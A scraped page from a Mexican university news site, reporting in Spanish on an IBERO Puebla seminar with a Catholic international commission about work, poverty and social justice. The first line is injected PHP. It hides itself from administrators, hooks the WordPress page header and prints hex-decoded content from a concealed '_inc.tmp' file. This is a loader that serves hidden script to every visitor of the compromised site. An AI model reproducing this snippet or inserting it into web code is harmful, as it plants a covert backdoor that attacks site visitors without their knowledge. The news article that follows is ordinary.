if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Pasar de una sociedad económica a una economía social proponen en la IBERO – La Opinión Universitaria La Opinión Universitaria
Menu

Pasar de una sociedad económica a una economía social proponen en la IBERO

 

 

+ Seminario con la Comisión Católica por la paz y la justicia

Representantes de la IBERO Puebla participaron en la ceremonia inaugural del Seminario que pretende traer a discusión la situación actual en materia económica y laboral. La bienvenida al evento fue encabezada por el Mario Ernesto Patrón Sánchez, rector de la Universidad, así como la Dra. Lilia Vélez Iglesias, directora general Académica.

En su mensaje, el Mtro. Patrón señaló la ausencia de oportunidades de futuro para las juventudes en nuestro país. “Para nosotros, el trabajo puede constituir una oportunidad para la paz y la justicia social. Vivimos en un México cada vez más complejo con índices cada vez más escandalosos”, apuntó.

Consideró que, en una nación con 54 millones de pobres, dicha condición se explica a través de la desigualdad, además de una ausencia de estado democrático de derecho. También denunció el trabajo de jóvenes y niños sicarios frente a la ausencia de posibilidades y condiciones de futuro. Hoy, cuando hay parcelas de nuestro país en las que los tejidos sociales están fracturados, las instituciones ya no hacen el mismo papel de cohesión social que ejecutaban en otros tiempos.

El rector de la IBERO Puebla concluyó agradeciendo la presencia y disposición de los representantes de la Comisión Católica, así como a las personas en el Laboratorio de Innovación Económica y Social (LAINES) por establecer un vínculo que busca traer a discusión diferentes alternativas de trabajo.

Tomando la palabra en representación de los invitados, el Mons. Robert Vitillo, secretario general de la CICM, recordó que la Comisión se fundó en 1951 por diversas organizaciones que se ocuparon de migración y refugiados, lo cual continúa hasta el día de hoy.

Apuntó que casi 30 organizaciones católicas internacionales vienen a la Conferencia Internacional sobre el Trabajo cada año en Ginebra con el fin de estudiar políticas comunes y desarrollar una ponencia, misma que derivó en la investigación El Futuro del Trabajo.

Alessandro Grassi, coordinador del eje Paz y Justicia de la investigación El futuro del trabajo después de la Laudato Sí, dio detalles sobre la forma en que dicho trabajo comenzó a cobrar forma. “La pregunta que se nos presentó fue: ¿Cómo los cambios en el mundo del trabajo afectan las condiciones de paz y justicia en un entorno específico?”, rememoró.

 

No comments

Deja una respuesta

Tweets recientes